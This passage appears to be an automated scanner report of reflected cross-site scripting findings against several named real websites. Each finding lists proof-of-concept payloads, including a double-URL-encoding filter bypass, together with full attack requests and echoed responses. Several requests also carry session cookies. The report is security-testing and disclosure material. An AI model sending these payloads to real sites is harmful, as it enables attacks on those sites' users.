The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc64"><script>alert(1)</script>1a393b12c55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:35 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17455
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/mediaacc64"><script>alert(1)</script>1a393b12c55/citysbest-min.css?58"/>
...[SNIP]...
5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f was submitted in the REST URL parameter 1. This input was echoed as 3ea01</script><script>alert(1)</script>71724f793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media3ea01%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71724f793f/citysbest-min.css?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17806
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
265.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media3ea01</script><script>alert(1)</script>71724f793f" : "national";

var isUrl2 = "citysbest-min.css";
s_265.prop2= isUrl2 != ''? "citysbest-min.css" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.
...[SNIP]...
5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4250"><script>alert(1)</script>9381a402f46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17178
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/media/citysbest-min.cssf4250"><script>alert(1)</script>9381a402f46?58"/>
...[SNIP]...
5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /media/citysbest-min.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2 was submitted in the REST URL parameter 2. This input was echoed as af55b</script><script>alert(1)</script>e29e0ad3a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /media/citysbest-min.cssaf55b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29e0ad3a2?58 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:37 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17387
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "media" : "national";

var isUrl2 = "citysbest-min.cssaf55b</script><script>alert(1)</script>e29e0ad3a2";
s_265.prop2= isUrl2 != ''? "citysbest-min.cssaf55b</script>
...[SNIP]...
5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc31"><script>alert(1)</script>9a5275880b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 17745
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/trafficebc31"><script>alert(1)</script>9a5275880b0/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718"/>
...[SNIP]...
5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e was submitted in the REST URL parameter 1. This input was echoed as 55d03</script><script>alert(1)</script>9c9e0bcf83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /traffic55d03%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c9e0bcf83e/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Ficid%3Dnavbar_citysbest_main5%2F&cb=1081493718 HTTP/1.1
Host: www.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 18075
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "traffic55d03</script><script>alert(1)</script>9c9e0bcf83e" : "national";

var isUrl2 = "";
s_265.prop2= isUrl2 != ''? "" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchaseID=Math.ceil(Math.random()
...[SNIP]...
5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 was submitted in the goto parameter. This input was echoed as 3f0b1'style='x:expression(alert(1))'8b36f925f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bitrix/redirect.php?event1=shareit_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=3f0b1'style%3d'x%3aexpression(alert(1))'8b36f925f23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 16:34:46 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A34%3A50; expires=Tue, 20-Mar-2012 16:34:50 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 38534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<input type='hidden' name='backurl' value='/bitrix/3f0b1'style='x:expression(alert(1))'8b36f925f23'>
...[SNIP]...
5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e9fb"><script>alert(1)</script>ec45f26fc89 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%238e9fb"><script>alert(1)</script>ec45f26fc89 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A33; expires=Tue, 20-Mar-2012 16:32:33 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 406

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4=8e9fb"><script>alert(1)</script>ec45f26fc89">
...[SNIP]...
5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f1"><script>alert(1)</script>c0e1758ffb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D%23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:32:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A32%3A41; expires=Tue, 20-Mar-2012 16:32:41 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 376

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input type=hidden name=GOTO value="https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1&GID=#EVENT_GI/c05f1"><script>alert(1)</script>c0e1758ffb3D#">
...[SNIP]...
5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e5209<script>alert(1)</script>5ce65e42038 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:19 GMT
Content-Length: 7536
Connection: close

window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},
...[SNIP]...
5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 10a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf was submitted in the gn parameter. This input was echoed as 10a73<img src=a onerror=alert(1)>afed2c094bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_110a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:18 GMT
Content-Length: 7539
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_110a73<img src=a onerror=alert(1)>afed2c094bf","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine Ferraro passes away at 75","views_amount":"
...[SNIP]...
5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload d63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e was submitted in the sn parameter. This input was echoed as d63f1<img src=a onerror=alert(1)>fdda9b0981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

